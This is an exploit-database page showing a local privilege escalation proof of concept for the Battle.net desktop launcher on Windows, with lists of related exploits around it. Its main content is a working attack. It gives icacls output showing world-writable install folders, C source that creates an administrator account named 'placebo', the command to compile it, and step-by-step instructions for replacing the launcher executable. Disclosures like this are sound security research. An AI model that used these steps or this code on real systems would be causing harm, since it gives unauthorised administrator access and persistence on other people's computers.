Become a patron and gain access to the dashboard, Schedule scans, API and Search

Search for hundreds of thousands of exploits

"Battle.Net 1.27.1.12428 - Insecure File Permissions"

Author

Exploit author

"George Tsimpidas"

Platform

Exploit platform

windows

Release date

Exploit published date

2020-10-13

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions
# Date: 2020-10-09
# Exploit Author: George Tsimpidas
# Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop )
# Version Patch: 1.27.1.12428
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
# Category: local



Vulnerability Description:

Battle.Net Launcher (Battle.net.exe) suffers from an elevation of
privileges
vulnerability which can be used by a simple user that can change the
executable file
with a binary of choice. The vulnerability exist due to the improper
permissions,
with the 'F' flag (Full) for 'Users' group, making the entire directory
'Battle.net' and its files and sub-dirs world-writable.

## Insecure Folder Permission

C:\Program Files (x86)>icacls Battle.net

Battle.net BUILTIN\Users:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
CREATOR OWNER:(OI)(CI)(F)

## Insecure File Permission

C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe"

Battle.net.exe BUILTIN\Users:(I)(F)
BUILTIN\Administrators:(I)(F)
FREY-OMEN\30698:(I)(F)


## Local Privilege Escalation Proof of Concept
#0. Download & install

#1. Create low privileged user & change to the user
## As admin

C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None

#2. Move the Service EXE to a new name

C:\Program Files (x86)\Battle.net> whoami

lowpriv

C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe
1 file(s) moved.

#3. Create malicious binary on kali linux

## Add Admin User C Code
kali# cat addAdmin.c
int main(void){
system("net user placebo mypassword /add");
system("net localgroup Administrators placebo /add");
WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0);
return 0;
}

## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe

#4. Transfer created 'Battle.net.exe' to the Windows Host

#5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files
(x86)\Battle.net>' Folder

C:\Program Files (x86)\Battle.net> move
C:\Users\lowpriv\Downloads\Battle.net.exe .

#6. Check that exploit admin user doesn't exists

C:\Program Files (x86)\Battle.net> net user placebo

The user name could not be found

#6. Reboot the Computer

C:\Program Files (x86)\Battle.net> shutdown /r

#7. Login & look at that new Admin

C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
/v "Full"

User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None
Release Date Title Type Platform Author
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-14 "Guild Wars 2 - Insecure Folder Permissions" local windows "George Tsimpidas"
2020-10-13 "Battle.Net 1.27.1.12428 - Insecure File Permissions" local windows "George Tsimpidas"
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-09-29 "BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)" local windows "Christian Vierschilling"
2020-09-29 "CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)" local windows boku
2020-09-28 "MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation" local windows "Matteo Malvica"
2020-09-21 "ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path" local windows "Burhanettin Ozgenc"
2020-09-17 "Microsoft SQL Server Reporting Services 2016 - Remote Code Execution" remote windows "West Shepherd"
2020-09-16 "Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software" local windows hyp3rlinx
Release Date Title Type Platform Author
2020-10-14 "Guild Wars 2 - Insecure Folder Permissions" local windows "George Tsimpidas"
2020-10-13 "Battle.Net 1.27.1.12428 - Insecure File Permissions" local windows "George Tsimpidas"
2020-10-12 "Liman 0.7 - Cross-Site Request Forgery (Change Password)" webapps multiple "George Tsimpidas"
2020-10-12 "Online Students Management System 1.0 - 'username' SQL Injections" webapps php "George Tsimpidas"
2020-08-31 "Mara CMS 7.5 - Reflective Cross-Site Scripting" webapps php "George Tsimpidas"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48873/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.